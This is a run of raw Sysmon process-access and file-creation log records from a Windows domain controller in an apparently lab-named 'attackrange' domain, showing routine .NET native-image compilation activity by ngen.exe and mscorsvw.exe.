{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.841\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108D2E1000}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.841","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108D2E1000}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.841\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108D2E1000}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.841","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108D2E1000}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.841\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108D2E1000}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.841","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108D2E1000}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.920\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-00100A020F00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.920","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-00100A020F00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.920\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-00100A020F00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.920","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-00100A020F00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.935\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-001091321000}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.935","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-001091321000}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:44.154\r\nProcessGuid: {E2A3D6B1-1393-5F25-0000-001091321000}\r\nProcessId: 1480\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c8-0\\System.Web.Entity.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:44.154","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:44.154","ProcessGuid":"{E2A3D6B1-1393-5F25-0000-001091321000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c8-0\\System.Web.Entity.Design.dll","CreationUtcTime":"2020-08-01 07:02:44.154","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.185\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-00108A5E0F00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:44.185","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-00108A5E0F00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:44.185\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-00108A5E0F00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 